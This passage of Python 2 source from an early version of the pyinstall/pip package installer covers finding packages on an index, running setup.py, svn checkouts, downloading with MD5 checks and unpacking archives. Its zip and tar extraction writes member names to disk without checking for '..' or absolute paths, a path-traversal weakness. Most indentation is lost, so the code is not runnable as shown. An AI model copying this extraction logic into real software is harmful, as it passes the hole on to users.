logger.notify('Successfully downloaded %s' % requirement_set)
except InstallationError, e:
logger.fatal(str(e))
logger.info('Exception information:\n%s' % format_exc())
exit = 1
except:
logger.fatal('Exception:\n%s' % format_exc())
exit = 2
if log_fp is not None:
log_fp.close()
if exit:
log_fn = './pyinstall-log.txt'
text = '\n'.join(complete_log)
logger.fatal('Storing complete log in %s' % log_fn)
log_fp = open_logfile_append(log_fn)
log_fp.write(text)
log_fp.close()
sys.exit(exit)
def format_exc(exc_info=None):
if exc_info is None:
exc_info = sys.exc_info()
out = StringIO()
traceback.print_exception(*exc_info, **dict(file=out))
return out.getvalue()
def restart_in_venv(venv, args):
"""
Restart this script using the interpreter in the given virtual environment
"""
venv = os.path.abspath(venv)
if not os.path.exists(venv):
try:
import virtualenv
except ImportError:
print 'The virtual environment does not exist: %s' % venv
print 'and virtualenv is not installed, so a new environment cannot be created'
sys.exit(3)
print 'Creating new virtualenv environment in %s' % venv
virtualenv.logger = logger
logger.indent += 2
## FIXME: always have no_site_packages?
virtualenv.create_environment(venv, site_packages=False)
if sys.platform == 'win32':
python = os.path.join(venv, 'Scripts', 'python')
else:
python = os.path.join(venv, 'bin', 'python')
if not os.path.exists(python):
python = venv
if not os.path.exists(python):
raise BadCommand('Cannot find virtual environment interpreter at %s' % python)
base = os.path.dirname(os.path.dirname(python))
os.execv(python, [python, __file__] + args + [base, '___VENV_RESTART___'])
class PackageFinder(object):
"""This finds packages.
This is meant to match easy_install's technique for looking for
packages, by reading pages and looking for appropriate links
"""
failure_limit = 3
def __init__(self, find_links, index_urls):
self.find_links = find_links
self.index_urls = index_urls
self.dependency_links = []
self.cache = PageCache()
def add_dependency_links(self, links):
## FIXME: this shouldn't be global list this, it should only
## apply to requirements of the package that specifies the
## dependency_links value
## FIXME: also, we should track comes_from (i.e., use Link)
self.dependency_links.extend(links)
def find_requirement(self, req, upgrade):
url_name = req.url_name
# Check that we have the url_name correctly spelled:
main_index_url = Link(posixpath.join(self.index_urls[0], url_name))
# This will also cache the page, so it's okay that we get it again later:
page = self._get_page(main_index_url, req)
if page is None:
url_name = self._find_url_name(Link(self.index_urls[0]), url_name, req)
if url_name is not None:
locations = [
posixpath.join(url, url_name)
for url in self.index_urls] + self.find_links
else:
locations = list(self.find_links)
locations.extend(self.dependency_links)
for version in req.absolute_versions:
locations = [
posixpath.join(url, url_name, version)] + locations
locations = [Link(url) for url in locations]
logger.debug('URLs to search for versions for %s:' % req)
for location in locations:
logger.debug('* %s' % location)
found_versions = []
for page in self._get_pages(locations, req):
logger.debug('Analyzing links from page %s' % page.url)
logger.indent += 2
try:
found_versions.extend(self._package_versions(page.links, req.name.lower()))
finally:
logger.indent -= 2
dependency_versions = list(self._package_versions([Link(url) for url in self.dependency_links], req.name.lower()))
if dependency_versions:
logger.info('dependency_links found: %s' % ', '.join([link.url for parsed, link, version in dependency_versions]))
found_versions.extend(dependency_versions)
if not found_versions:
logger.fatal('Could not find any downloads that satisfy the requirement %s' % req)
raise DistributionNotFound('No distributions at all found for %s' % req)
if req.satisfied_by is not None:
found_versions.append((req.satisfied_by.parsed_version, Inf, req.satisfied_by.version))
found_versions.sort(reverse=True)
applicable_versions = []
for (parsed_version, link, version) in found_versions:
if version not in req.req:
logger.info("Ignoring link %s, version %s doesn't match %s"
% (link, version, ','.join([''.join(s) for s in req.req.specs])))
continue
applicable_versions.append((link, version))
existing_applicable = bool([link for link, version in applicable_versions if link is Inf])
if not upgrade and existing_applicable:
            if applicable_versions[0][0] is Inf:
logger.info('Existing installed version (%s) is most up-to-date and satisfies requirement'
% req.satisfied_by.version)
else:
logger.info('Existing installed version (%s) satisfies requirement (most up-to-date version is %s)'
                            % (req.satisfied_by.version, applicable_versions[0][1]))
return None
if not applicable_versions:
logger.fatal('Could not find a version that satisfies the requirement %s (from versions: %s)'
% (req, ', '.join([version for parsed_version, link, version in found_versions])))
raise DistributionNotFound('No distributions matching the version for %s' % req)
if applicable_versions[0][0] is Inf:
# We have an existing version, and its the best version
logger.info('Installed version (%s) is most up-to-date (past versions: %s)'
% (req.satisfied_by.version, ', '.join([version for link, version in applicable_versions[1:]]) or 'none'))
return None
if len(applicable_versions) > 1:
logger.info('Using version %s (newest of versions: %s)' %
(applicable_versions[0][1], ', '.join([version for link, version in applicable_versions])))
return applicable_versions[0][0]
def _find_url_name(self, index_url, url_name, req):
"""Finds the true URL name of a package, when the given name isn't quite correct.
This is usually used to implement case-insensitivity."""
if not index_url.url.endswith('/'):
# Vaguely part of the PyPI API... weird but true.
## FIXME: bad to modify this?
index_url.url += '/'
page = self._get_page(index_url, req)
if page is None:
logger.fatal('Cannot fetch index base URL %s' % index_url)
raise DistributionNotFound('Cannot find requirement %s, nor fetch index URL %s' % (req, index_url))
norm_name = normalize_name(req.url_name)
for link in page.links:
base = posixpath.basename(link.path.rstrip('/'))
if norm_name == normalize_name(base):
logger.notify('Real name of requirement %s is %s' % (url_name, base))
return base
return None
def _get_pages(self, locations, req):
"""Yields (page, page_url) from the given locations, skipping
locations that have errors, and adding download/homepage links"""
pending_queue = Queue()
for location in locations:
pending_queue.put(location)
done = []
seen = set()
threads = []
for i in range(min(10, len(locations))):
t = threading.Thread(target=self._get_queued_page, args=(req, pending_queue, done, seen))
t.setDaemon(True)
threads.append(t)
t.start()
for t in threads:
t.join()
return done
_log_lock = threading.Lock()
def _get_queued_page(self, req, pending_queue, done, seen):
while 1:
try:
location = pending_queue.get(False)
except QueueEmpty:
return
if location in seen:
continue
seen.add(location)
page = self._get_page(location, req)
if page is None:
continue
done.append(page)
for link in page.rel_links():
pending_queue.put(link)
_egg_fragment_re = re.compile(r'#egg=([^&]*)')
_egg_info_re = re.compile(r'([a-z0-9_.]+)-([a-z0-9_.-]+)', re.I)
_py_version_re = re.compile(r'-py([123]\.[0-9])$')
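    # _package_versions (below) turns raw links into candidate versions.  For an
    # sdist link such as Foo-1.2.tar.gz (illustrative name), splitext() yields
    # ('Foo-1.2', '.tar.gz'); _egg_info_matches() then strips the 'Foo' prefix
    # and returns '1.2'.  A '-pyX.Y' suffix in the version is kept only when
    # X.Y matches the running interpreter's sys.version[:3].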
def _package_versions(self, links, search_name):
seen_links = {}
for link in links:
if link.url in seen_links:
continue
seen_links[link.url] = None
if link.egg_fragment:
egg_info = link.egg_fragment
else:
path = link.path
egg_info, ext = link.splitext()
if not ext:
logger.debug('Skipping link %s; not a file' % link)
continue
if egg_info.endswith('.tar'):
# Special double-extension case:
egg_info = egg_info[:-4]
ext = '.tar' + ext
if ext not in ('.tar.gz', '.tar.bz2', '.tar', '.tgz', '.zip'):
logger.debug('Skipping link %s; unknown archive format: %s' % (link, ext))
continue
version = self._egg_info_matches(egg_info, search_name, link)
if version is None:
logger.debug('Skipping link %s; wrong project name (not %s)' % (link, search_name))
continue
match = self._py_version_re.search(version)
if match:
version = version[:match.start()]
py_version = match.group(1)
if py_version != sys.version[:3]:
logger.debug('Skipping %s because Python version is incorrect' % link)
continue
logger.debug('Found link %s, version: %s' % (link, version))
yield (pkg_resources.parse_version(version),
link,
version)
def _egg_info_matches(self, egg_info, search_name, link):
match = self._egg_info_re.search(egg_info)
if not match:
logger.debug('Could not parse version from link: %s' % link)
return None
name = match.group(0).lower()
# To match the "safe" name that pkg_resources creates:
name = name.replace('_', '-')
if name.startswith(search_name.lower()):
return match.group(0)[len(search_name):].lstrip('-')
else:
return None
def _get_page(self, link, req):
return HTMLPage.get_page(link, req, cache=self.cache)
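# Illustrative use of PackageFinder (a sketch; the index URL is only an example):
#   finder = PackageFinder(find_links=[], index_urls=['http://pypi.python.org/simple/'])
#   req = InstallRequirement.from_line('SomePackage>=1.0')
#   link = finder.find_requirement(req, upgrade=False)   # -> Link to the best sdist, or None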
class InstallRequirement(object):
def __init__(self, req, comes_from, source_dir=None, editable=False,
url=None, update=True):
if isinstance(req, basestring):
req = pkg_resources.Requirement.parse(req)
self.req = req
self.comes_from = comes_from
self.source_dir = source_dir
self.editable = editable
if editable:
assert url, "You must give url with editable=True"
self.url = url
self._egg_info_path = None
# This holds the pkg_resources.Distribution object if this requirement
# is already available:
self.satisfied_by = None
self._temp_build_dir = None
self._is_bundle = None
# True if the editable should be updated:
self.update = update
@classmethod
def from_editable(cls, editable_req, comes_from=None):
name, url = parse_editable(editable_req)
return cls(name, comes_from, editable=True, url=url)
@classmethod
def from_line(cls, name, comes_from=None):
"""Creates an InstallRequirement from a name, which might be a
requirement, filename, or URL.
"""
url = None
req = name
if is_url(name):
url = name
## FIXME: I think getting the requirement here is a bad idea:
#req = get_requirement_from_url(url)
req = None
elif is_filename(name):
if not os.path.exists(name):
logger.warn('Requirement %r looks like a filename, but the file does not exist'
% name)
url = filename_to_url(name)
#req = get_requirement_from_url(url)
req = None
return cls(req, comes_from, url=url)
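    # from_line() (above) accepts three shapes of input (illustrative values):
    #   'SomePackage>=1.0'            -> parsed with pkg_resources.Requirement
    #   'http://host/Pkg-1.0.tar.gz'  -> treated as a URL; req is filled in later from egg_info
    #   './Pkg-1.0.tar.gz'            -> an existing local archive, converted with filename_to_url()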
def __str__(self):
if self.req:
s = str(self.req)
if self.url:
s += ' from %s' % self.url
else:
s = self.url
if self.satisfied_by is not None:
s += ' in %s' % display_path(self.satisfied_by.location)
if self.editable:
if self.req:
s += ' checkout from %s' % self.url
if self.comes_from:
if isinstance(self.comes_from, basestring):
comes_from = self.comes_from
else:
comes_from = self.comes_from.from_path()
s += ' (from %s)' % comes_from
return s
def from_path(self):
s = str(self.req)
if self.comes_from:
if isinstance(self.comes_from, basestring):
comes_from = self.comes_from
else:
comes_from = self.comes_from.from_path()
s += '->' + comes_from
return s
def build_location(self, build_dir):
if self._temp_build_dir is not None:
return self._temp_build_dir
if self.req is None:
self._temp_build_dir = tempfile.mkdtemp('-build', 'pyinstall-')
return self._temp_build_dir
if self.editable:
name = self.name.lower()
else:
name = self.name
return os.path.join(build_dir, name)
@property
def name(self):
if self.req is None:
return None
return self.req.project_name
@property
def url_name(self):
if self.req is None:
return None
return urllib.quote(self.req.unsafe_name)
@property
def setup_py(self):
return os.path.join(self.source_dir, 'setup.py')
def run_egg_info(self):
assert self.source_dir
if self.name:
logger.notify('Running setup.py egg_info for package %s' % self.name)
else:
logger.notify('Running setup.py egg_info for package from %s' % self.url)
logger.indent += 2
try:
script = self._run_setup_py
script = script.replace('__SETUP_PY__', repr(self.setup_py))
script = script.replace('__PKG_NAME__', repr(self.name))
# We can't put the .egg-info files at the root, because then the source code will be mistaken
# for an installed egg, causing problems
if self.editable:
egg_base_option = []
else:
egg_info_dir = os.path.join(self.source_dir, 'pyinstall-egg-info')
if not os.path.exists(egg_info_dir):
os.makedirs(egg_info_dir)
egg_base_option = ['--egg-base', 'pyinstall-egg-info']
call_subprocess(
[sys.executable, '-c', script, 'egg_info'] + egg_base_option,
cwd=self.source_dir, filter_stdout=self._filter_install, show_stdout=False,
command_level=Logger.VERBOSE_DEBUG,
command_desc='python setup.py egg_info')
finally:
logger.indent -= 2
if not self.req:
self.req = pkg_resources.Requirement.parse(self.pkg_info()['Name'])
## FIXME: This is a lame hack, entirely for PasteScript which has
## a self-provided entry point that causes this awkwardness
_run_setup_py = """
__file__ = __SETUP_PY__
from setuptools.command import egg_info
def replacement_run(self):
self.mkpath(self.egg_info)
installer = self.distribution.fetch_build_egg
for ep in egg_info.iter_entry_points('egg_info.writers'):
# require=False is the change we're making:
writer = ep.load(require=False)
writer(self, ep.name, egg_info.os.path.join(self.egg_info,ep.name))
self.find_sources()
egg_info.egg_info.run = replacement_run
execfile(__file__)
"""
def egg_info_data(self, filename):
if self.satisfied_by is not None:
if not self.satisfied_by.has_metadata(filename):
return None
return self.satisfied_by.get_metadata(filename)
assert self.source_dir
filename = self.egg_info_path(filename)
if not os.path.exists(filename):
return None
fp = open(filename, 'r')
data = fp.read()
fp.close()
return data
def egg_info_path(self, filename):
if self._egg_info_path is None:
if self.editable:
base = self.source_dir
else:
base = os.path.join(self.source_dir, 'pyinstall-egg-info')
filenames = os.listdir(base)
if self.editable:
filenames = [f for f in filenames if f.endswith('.egg-info')]
assert len(filenames) == 1, "Unexpected files/directories in %s: %s" % (base, ' '.join(filenames))
self._egg_info_path = os.path.join(base, filenames[0])
return os.path.join(self._egg_info_path, filename)
def egg_info_lines(self, filename):
data = self.egg_info_data(filename)
if not data:
return []
result = []
for line in data.splitlines():
line = line.strip()
if not line or line.startswith('#'):
continue
result.append(line)
return result
def pkg_info(self):
p = FeedParser()
data = self.egg_info_data('PKG-INFO')
if not data:
logger.warn('No PKG-INFO file found in %s' % display_path(self.egg_info_path('PKG-INFO')))
p.feed(data or '')
return p.close()
@property
def dependency_links(self):
return self.egg_info_lines('dependency_links.txt')
_requirements_section_re = re.compile(r'\[(.*?)\]')
def requirements(self, extras=()):
in_extra = None
for line in self.egg_info_lines('requires.txt'):
match = self._requirements_section_re.match(line)
if match:
in_extra = match.group(1)
continue
if in_extra and in_extra not in extras:
# Skip requirement for an extra we aren't requiring
continue
yield line
@property
def absolute_versions(self):
for qualifier, version in self.req.specs:
if qualifier == '==':
yield version
@property
def installed_version(self):
return self.pkg_info()['version']
def assert_source_matches_version(self):
assert self.source_dir
if self.comes_from == 'command line':
# We don't check the versions of things explicitly installed.
# This makes, e.g., "pyinstall Package==dev" possible
return
version = self.installed_version
if version not in self.req:
logger.fatal(
'Source in %s has the version %s, which does not match the requirement %s'
% (display_path(self.source_dir), version, self))
raise InstallationError(
'Source in %s has version %s that conflicts with %s'
% (display_path(self.source_dir), version, self))
else:
logger.debug('Source in %s has version %s, which satisfies requirement %s'
% (display_path(self.source_dir), version, self))
def update_editable(self):
assert self.editable and self.url
assert self.source_dir
assert '+' in self.url, "bad url: %r" % self.url
if not self.update:
return
vc_type, url = self.url.split('+', 1)
vc_type = vc_type.lower()
if vc_type == 'svn':
self.checkout_svn()
else:
assert 0, (
'Unexpected version control type (in %s): %s'
% (self.url, vc_type))
def checkout_svn(self):
url = self.url.split('+', 1)[1]
url = url.split('#', 1)[0]
if '@' in url:
url, rev = url.split('@', 1)
else:
rev = None
if rev:
rev_options = ['-r', rev]
rev_display = ' (to revision %s)' % rev
else:
rev_options = []
rev_display = ''
dest = self.source_dir
checkout = True
if os.path.exists(os.path.join(self.source_dir, '.svn')):
existing_url = _get_svn_info(self.source_dir)[0]
checkout = False
if existing_url == url:
logger.info('Checkout in %s exists, and has correct URL (%s)'
% (display_path(self.source_dir), url))
logger.notify('Updating checkout %s%s' % (display_path(self.source_dir), rev_display))
call_subprocess(
['svn', 'update'] + rev_options + [self.source_dir])
else:
logger.warn('svn checkout in %s exists with URL %s' % (display_path(self.source_dir), existing_url))
logger.warn('The plan is to install the svn repository %s' % url)
response = ask('What to do? (s)witch, (i)gnore, (w)ipe, (b)ackup', ('s', 'i', 'w', 'b'))
if response == 's':
logger.notify('Switching checkout %s to %s%s'
% (display_path(self.source_dir), url, rev_display))
call_subprocess(
['svn', 'switch'] + rev_options + [url, self.source_dir])
elif response == 'i':
# do nothing
pass
elif response == 'w':
logger.warn('Deleting %s' % display_path(self.source_dir))
shutil.rmtree(self.source_dir)
checkout = True
elif response == 'b':
dest_dir = backup_dir(self.source_dir)
                    logger.warn('Backing up %s to %s' % (display_path(self.source_dir), display_path(dest_dir)))
shutil.move(self.source_dir, dest_dir)
checkout = True
if checkout:
logger.notify('Checking out %s%s to %s' % (url, rev_display, display_path(self.source_dir)))
call_subprocess(
['svn', 'checkout', '-q'] + rev_options + [url, self.source_dir])
def install(self, install_options):
if self.editable:
self.install_editable()
return
## FIXME: this is not a useful record:
## Also a bad location
## And not right on Windows
install_location = os.path.join(sys.prefix, 'lib', 'python%s' % sys.version[:3])
record_filename = os.path.join(install_location, 'install-record-%s.txt' % self.name)
## FIXME: I'm not sure if this is a reasonable location; probably not
## but we can't put it in the default location, as that is a virtualenv symlink that isn't writable
header_dir = os.path.join(os.path.dirname(os.path.dirname(self.source_dir)), 'lib', 'include')
logger.notify('Running setup.py install for %s' % self.name)
logger.indent += 2
try:
call_subprocess(
[sys.executable, '-c',
"import setuptools; __file__=%r; execfile(%r)" % (self.setup_py, self.setup_py),
'install', '--single-version-externally-managed', '--record', record_filename,
'--install-headers', header_dir] + install_options,
cwd=self.source_dir, filter_stdout=self._filter_install, show_stdout=False)
finally:
logger.indent -= 2
def remove_temporary_source(self):
"""Remove the source files from this requirement, if they are marked
for deletion"""
if self.is_bundle or os.path.exists(self.delete_marker_filename):
logger.info('Removing source in %s' % self.source_dir)
if self.source_dir:
shutil.rmtree(self.source_dir)
self.source_dir = None
if self._temp_build_dir and os.path.exists(self._temp_build_dir):
shutil.rmtree(self._temp_build_dir)
self._temp_build_dir = None
def install_editable(self):
logger.notify('Running setup.py develop for %s' % self.name)
logger.indent += 2
try:
## FIXME: should we do --install-headers here too?
call_subprocess(
[sys.executable, '-c',
"import setuptools; __file__=%r; execfile(%r)" % (self.setup_py, self.setup_py),
'develop', '--no-deps'], cwd=self.source_dir, filter_stdout=self._filter_install,
show_stdout=False)
finally:
logger.indent -= 2
def _filter_install(self, line):
level = Logger.NOTIFY
for regex in [r'^running .*', r'^writing .*', '^creating .*', '^[Cc]opying .*',
r'^reading .*', r"^removing .*\.egg-info' \(and everything under it\)$",
r'^byte-compiling ',
# Not sure what this warning is, but it seems harmless:
r"^warning: manifest_maker: standard file '-c' not found$"]:
if re.search(regex, line.strip()):
level = Logger.INFO
break
return (level, line)
def check_if_exists(self):
"""Checks if this requirement is satisfied by something already installed"""
if self.req is None:
return False
try:
dist = pkg_resources.get_distribution(self.req)
except pkg_resources.DistributionNotFound:
return False
self.satisfied_by = dist
return True
@property
def is_bundle(self):
if self._is_bundle is not None:
return self._is_bundle
base = self._temp_build_dir
if not base:
## FIXME: this doesn't seem right:
return False
self._is_bundle = os.path.exists(os.path.join(base, 'pyinstall-manifest.txt'))
return self._is_bundle
def bundle_requirements(self):
base = self._temp_build_dir
assert base
src_dir = os.path.join(base, 'src')
build_dir = os.path.join(base, 'build')
if os.path.exists(src_dir):
for package in os.listdir(src_dir):
## FIXME: svnism:
url = 'svn+' + _get_svn_info(os.path.join(src_dir, package))[0]
yield InstallRequirement(
package, self, editable=True, url=url,
update=False)
if os.path.exists(build_dir):
for package in os.listdir(build_dir):
yield InstallRequirement(
package, self)
def move_bundle_files(self, dest_build_dir, dest_src_dir):
base = self._temp_build_dir
assert base
src_dir = os.path.join(base, 'src')
build_dir = os.path.join(base, 'build')
for source_dir, dest_dir in [(src_dir, dest_src_dir),
(build_dir, dest_build_dir)]:
if os.path.exists(source_dir):
for dirname in os.listdir(source_dir):
dest = os.path.join(dest_dir, dirname)
if os.path.exists(dest):
logger.warn('The directory %s (containing package %s) already exists; cannot move source from bundle %s'
% (dest, dirname, self))
continue
if not os.path.exists(dest_dir):
logger.info('Creating directory %s' % dest_dir)
os.makedirs(dest_dir)
shutil.move(os.path.join(source_dir, dirname), dest)
@property
def delete_marker_filename(self):
assert self.source_dir
return os.path.join(self.source_dir, 'pyinstall-delete-this-directory.txt')
DELETE_MARKER_MESSAGE = '''\
This file is placed here by pyinstall to indicate the source was put
here by pyinstall.
Once this package is successfully installed this source code will be
deleted (unless you remove this file).
'''
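# Illustrative end-to-end flow with RequirementSet (a sketch using this module's API):
#   requirement_set = RequirementSet(build_dir='build', src_dir='src')
#   requirement_set.add_requirement(InstallRequirement.from_line('SomePackage'))
#   requirement_set.install_files(finder)   # download/unpack, recursing into dependencies
#   requirement_set.install([])             # run setup.py install for each collected package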
class RequirementSet(object):
def __init__(self, build_dir, src_dir, upgrade=False, ignore_installed=False):
self.build_dir = build_dir
self.src_dir = src_dir
self.upgrade = upgrade
self.ignore_installed = ignore_installed
self.requirements = {}
# Mapping of alias: real_name
self.requirement_aliases = {}
self.unnamed_requirements = []
def __str__(self):
reqs = [req for req in self.requirements.values()
if not req.comes_from]
reqs.sort(key=lambda req: req.name.lower())
return ' '.join([str(req.req) for req in reqs])
def add_requirement(self, install_req):
name = install_req.name
if not name:
self.unnamed_requirements.append(install_req)
else:
if self.has_requirement(name):
raise InstallationError(
                    'Double requirement given: %s (already in %s, name=%r)'
% (install_req, self.get_requirement(name), name))
self.requirements[name] = install_req
## FIXME: what about other normalizations? E.g., _ vs. -?
if name.lower() != name:
self.requirement_aliases[name.lower()] = name
def has_requirement(self, project_name):
for name in project_name, project_name.lower():
if name in self.requirements or name in self.requirement_aliases:
return True
return False
def get_requirement(self, project_name):
for name in project_name, project_name.lower():
if name in self.requirements:
return self.requirements[name]
if name in self.requirement_aliases:
return self.requirements[self.requirement_aliases[name]]
raise KeyError("No project with the name %r" % project_name)
def install_files(self, finder):
unnamed = list(self.unnamed_requirements)
reqs = self.requirements.values()
while reqs or unnamed:
if unnamed:
req_to_install = unnamed.pop(0)
else:
req_to_install = reqs.pop(0)
install = True
if not self.ignore_installed and not req_to_install.editable:
if req_to_install.check_if_exists():
if not self.upgrade:
# If we are upgrading, we still need to check the version
install = False
if req_to_install.satisfied_by is not None:
logger.notify('Requirement already satisfied: %s' % req_to_install)
elif req_to_install.editable:
logger.notify('Checking out %s' % req_to_install)
else:
if req_to_install.url and req_to_install.url.lower().startswith('file:'):
logger.notify('Unpacking %s' % display_path(url_to_filename(req_to_install.url)))
else:
logger.notify('Downloading/unpacking %s' % req_to_install)
logger.indent += 2
is_bundle = False
try:
if req_to_install.editable:
location = req_to_install.build_location(self.src_dir)
req_to_install.source_dir = location
req_to_install.update_editable()
req_to_install.run_egg_info()
elif install:
location = req_to_install.build_location(self.build_dir)
                    ## FIXME: is the existence of the checkout good enough to use it? I don't think so.
unpack = True
if not os.path.exists(os.path.join(location, 'setup.py')):
## FIXME: this won't upgrade when there's an existing package unpacked in `location`
if req_to_install.url is None:
url = finder.find_requirement(req_to_install, upgrade=self.upgrade)
else:
## FIXME: should req_to_install.url already be a link?
url = Link(req_to_install.url)
assert url
if url:
try:
self.unpack_url(url, location)
except urllib2.HTTPError, e:
logger.fatal('Could not install requirement %s because of error %s'
% (req_to_install, e))
raise InstallationError(
'Could not install requirement %s because of HTTP error %s for URL %s'
% (req_to_install, e, url))
else:
unpack = False
if unpack:
is_bundle = req_to_install.is_bundle
if is_bundle:
for subreq in req_to_install.bundle_requirements():
reqs.append(subreq)
self.add_requirement(subreq)
req_to_install.move_bundle_files(self.build_dir, self.src_dir)
else:
req_to_install.source_dir = location
req_to_install.run_egg_info()
req_to_install.assert_source_matches_version()
f = open(req_to_install.delete_marker_filename, 'w')
f.write(DELETE_MARKER_MESSAGE)
f.close()
if not is_bundle:
## FIXME: shouldn't be globally added:
finder.add_dependency_links(req_to_install.dependency_links)
## FIXME: add extras in here:
for req in req_to_install.requirements():
try:
name = pkg_resources.Requirement.parse(req).project_name
except ValueError, e:
## FIXME: proper warning
logger.error('Invalid requirement: %r (%s) in requirement %s' % (req, e, req_to_install))
continue
if self.has_requirement(name):
## FIXME: check for conflict
continue
subreq = InstallRequirement(req, req_to_install)
reqs.append(subreq)
self.add_requirement(subreq)
if req_to_install.name not in self.requirements:
self.requirements[req_to_install.name] = req_to_install
else:
req_to_install.remove_temporary_source()
finally:
logger.indent -= 2
def unpack_url(self, link, location):
if link.scheme == 'svn' or link.scheme == 'svn+ssh':
self.svn_checkout(link, location)
return
dir = tempfile.mkdtemp()
if link.url.lower().startswith('file:'):
source = url_to_filename(link.url)
            content_type = mimetypes.guess_type(source)[0]
self.unpack_file(source, location, content_type, link)
return
md5_hash = link.md5_hash
target_url = link.url.split('#', 1)[0]
target_file = None
if os.environ.get('PYINSTALL_DOWNLOAD_CACHE'):
target_file = os.path.join(os.environ['PYINSTALL_DOWNLOAD_CACHE'],
urllib.quote(target_url, ''))
if (target_file and os.path.exists(target_file)
and os.path.exists(target_file+'.content-type')):
fp = open(target_file+'.content-type')
content_type = fp.read().strip()
fp.close()
if md5_hash:
download_hash = md5()
fp = open(target_file, 'rb')
while 1:
chunk = fp.read(4096)
if not chunk:
break
download_hash.update(chunk)
fp.close()
temp_location = target_file
logger.notify('Using download cache from %s' % target_file)
else:
try:
resp = urllib2.urlopen(target_url)
except urllib2.HTTPError, e:
logger.fatal("HTTP error %s while getting %s" % (e.code, link))
raise
except IOError, e:
# Typically an FTP error
logger.fatal("Error %s while getting %s" % (e, link))
raise
content_type = resp.info()['content-type']
filename = link.filename
ext = splitext(filename)
if not ext:
ext = mimetypes.guess_extension(content_type)
filename += ext
temp_location = os.path.join(dir, filename)
fp = open(temp_location, 'wb')
if md5_hash:
download_hash = md5()
try:
total_length = int(resp.info()['content-length'])
except (ValueError, KeyError):
total_length = 0
downloaded = 0
show_progress = total_length > 40*1000 or not total_length
show_url = link.show_url
try:
if show_progress:
## FIXME: the URL can get really long in this message:
if total_length:
logger.start_progress('Downloading %s (%s): ' % (show_url, format_size(total_length)))
else:
logger.start_progress('Downloading %s (unknown size): ' % show_url)
else:
logger.notify('Downloading %s' % show_url)
logger.debug('Downloading from URL %s' % link)
while 1:
chunk = resp.read(4096)
if not chunk:
break
downloaded += len(chunk)
if show_progress:
if not total_length:
logger.show_progress('%s' % format_size(downloaded))
else:
logger.show_progress('%3i%% %s' % (100*downloaded/total_length, format_size(downloaded)))
if md5_hash:
download_hash.update(chunk)
fp.write(chunk)
fp.close()
finally:
if show_progress:
logger.end_progress('%s downloaded' % format_size(downloaded))
if md5_hash:
download_hash = download_hash.hexdigest()
if download_hash != md5_hash:
logger.fatal("MD5 hash of the package %s (%s) doesn't match the expected hash %s!"
% (link, download_hash, md5_hash))
raise InstallationError('Bad MD5 hash for package %s' % link)
self.unpack_file(temp_location, location, content_type, link)
if target_file and target_file != temp_location:
logger.notify('Storing download in cache at %s' % display_path(target_file))
shutil.copyfile(temp_location, target_file)
fp = open(target_file+'.content-type', 'w')
fp.write(content_type)
fp.close()
os.unlink(temp_location)
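    # unpack_url (above) honours an optional download cache: when the
    # PYINSTALL_DOWNLOAD_CACHE environment variable points at a directory, each
    # downloaded archive is stored there under urllib.quote(url, '') together
    # with a '<name>.content-type' sidecar file, and reused on later runs.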
def unpack_file(self, filename, location, content_type, link):
if (content_type == 'application/zip'
or filename.endswith('.zip')
or filename.endswith('.pybundle')):
self.unzip_file(filename, location, flatten=not filename.endswith('.pybundle'))
elif (content_type == 'application/x-gzip'
or tarfile.is_tarfile(filename)
or splitext(filename)[1].lower() in ('.tar', '.tar.gz', '.tar.bz2', '.tgz')):
self.untar_file(filename, location)
elif (content_type.startswith('text/html')
and is_svn_page(file_contents(filename))):
# We don't really care about this
self.svn_checkout(link.url, location)
else:
## FIXME: handle?
## FIXME: magic signatures?
logger.fatal('Cannot unpack file %s (downloaded from %s, content-type: %s); cannot detect archive format'
% (filename, location, content_type))
raise InstallationError('Cannot determine archive format of %s' % location)
def unzip_file(self, filename, location, flatten=True):
"""Unzip the file (zip file located at filename) to the destination
location"""
if not os.path.exists(location):
os.makedirs(location)
zipfp = open(filename, 'rb')
try:
zip = zipfile.ZipFile(zipfp)
leading = has_leading_dir(zip.namelist()) and flatten
for name in zip.namelist():
data = zip.read(name)
fn = name
if leading:
fn = split_leading_dir(name)[1]
fn = os.path.join(location, fn)
dir = os.path.dirname(fn)
if not os.path.exists(dir):
os.makedirs(dir)
if fn.endswith('/'):
# A directory
if not os.path.exists(fn):
os.makedirs(fn)
else:
fp = open(fn, 'wb')
try:
fp.write(data)
finally:
fp.close()
finally:
zipfp.close()
def untar_file(self, filename, location):
"""Untar the file (tar file located at filename) to the destination location"""
if not os.path.exists(location):
os.makedirs(location)
if filename.lower().endswith('.gz') or filename.lower().endswith('.tgz'):
mode = 'r:gz'
elif filename.lower().endswith('.bz2'):
mode = 'r:bz2'
elif filename.lower().endswith('.tar'):
mode = 'r'
else:
logger.warn('Cannot determine compression type for file %s' % filename)
mode = 'r:*'
tar = tarfile.open(filename, mode)
try:
leading = has_leading_dir([member.name for member in tar.getmembers()])
for member in tar.getmembers():
fn = member.name
if leading:
fn = split_leading_dir(fn)[1]
path = os.path.join(location, fn)
if member.isdir():
if not os.path.exists(path):
os.makedirs(path)
else:
fp = tar.extractfile(member)
if not os.path.exists(os.path.dirname(path)):
os.makedirs(os.path.dirname(path))
destfp = open(path, 'wb')
try:
shutil.copyfileobj(fp, destfp)
finally:
destfp.close()
fp.close()
finally:
tar.close()
def svn_checkout(self, url, location):
"""Check out the svn repository at the url to the destination location"""
if '#' in url:
url = url.split('#', 1)[0]
logger.notify('Checking out svn repository %s to %s' % (url, location))
logger.indent += 2
try:
## FIXME: not sure that --force is good, but it is needed
## when installing directly (not via a requirement),
## because the destination directory already exists.
call_subprocess(['svn', 'checkout', '--force', url, location],
filter_stdout=self._filter_svn, show_stdout=False)
finally:
logger.indent -= 2
def _filter_svn(self, line):
return (Logger.INFO, line)
def install(self, install_options):
"""Install everything in this set (after having downloaded and unpacked the packages)"""
requirements = sorted(self.requirements.values(), key=lambda p: p.name.lower())
logger.notify('Installing collected packages: %s' % (', '.join([req.name for req in requirements])))
logger.indent += 2
try:
for requirement in self.requirements.values():
if requirement.satisfied_by is not None:
# Already installed
continue
requirement.install(install_options)
requirement.remove_temporary_source()
finally:
logger.indent -= 2
def create_bundle(self, bundle_filename):
## FIXME: can't decide which is better; zip is easier to read
## random files from, but tar.bz2 is smaller and not as lame a
## format.
## FIXME: this file should really include a manifest of the
## packages, maybe some other metadata files. It would make
## it easier to detect as well.
zip = zipfile.ZipFile(bundle_filename, 'w', zipfile.ZIP_DEFLATED)
svn_dirs = []
for dir, basename in (self.build_dir, 'build'), (self.src_dir, 'src'):
dir = os.path.normcase(os.path.abspath(dir))
for dirpath, dirnames, filenames in os.walk(dir):
svn_url = svn_rev = None
if '.svn' in dirnames:
for svn_dir in svn_dirs:
